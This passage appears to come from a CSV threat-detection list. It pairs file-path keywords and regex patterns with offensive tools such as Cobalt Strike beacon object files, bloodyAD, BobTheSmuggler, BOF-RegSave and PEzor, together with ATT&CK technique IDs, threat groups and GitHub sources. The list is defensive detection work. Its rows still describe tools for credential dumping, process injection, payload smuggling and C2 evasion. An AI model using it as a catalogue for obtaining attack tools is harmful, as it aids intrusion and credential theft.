- T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_ou.py*",".{0,1000}\/bloodhound_ou\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_schema.py*",".{0,1000}\/bloodhound_schema\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by 
ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound-data*",".{0,1000}\/bloodhound\-data.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/bloodhound-quickwin.git*",".{0,1000}\/bloodhound\-quickwin\.git.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*/bloodyAD.git*",".{0,1000}\/bloodyAD\.git.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*/bluscreenofjeff/*",".{0,1000}\/bluscreenofjeff\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*/Bo0oM*",".{0,1000}\/Bo0oM.{0,1000}","offensive_tool_keyword","Github Username","Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. Russia","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Bo0oM","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/BobTheSmuggler.git*",".{0,1000}\/BobTheSmuggler\.git.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*/bof.cpp *",".{0,1000}\/bof\.cpp\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/bof.h",".{0,1000}\/bof\.h","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*/BOF.NET/*",".{0,1000}\/BOF\.NET\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*/bof.nim",".{0,1000}\/bof\.nim","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC 
Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof/bof.c",".{0,1000}\/bof\/bof\.c","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof/bof.vcxproj*",".{0,1000}\/bof\/bof\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof/IABOF*",".{0,1000}\/bof\/IABOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/bof/IAStart.asm*",".{0,1000}\/bof\/IAStart\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/bof_reg_collect_parser.py*",".{0,1000}\/bof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/BOF-Builder*",".{0,1000}\/BOF\-Builder.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in 
mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*/bof-collection/*",".{0,1000}\/bof\-collection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/bofhound.git*",".{0,1000}\/bofhound\.git.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/BOFMask.git*",".{0,1000}\/BOFMask\.git.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*/bofmask.h*",".{0,1000}\/bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*/BOFNETExamples/*",".{0,1000}\/BOFNETExamples\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*/BOF-RegSave*",".{0,1000}\/BOF\-RegSave.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
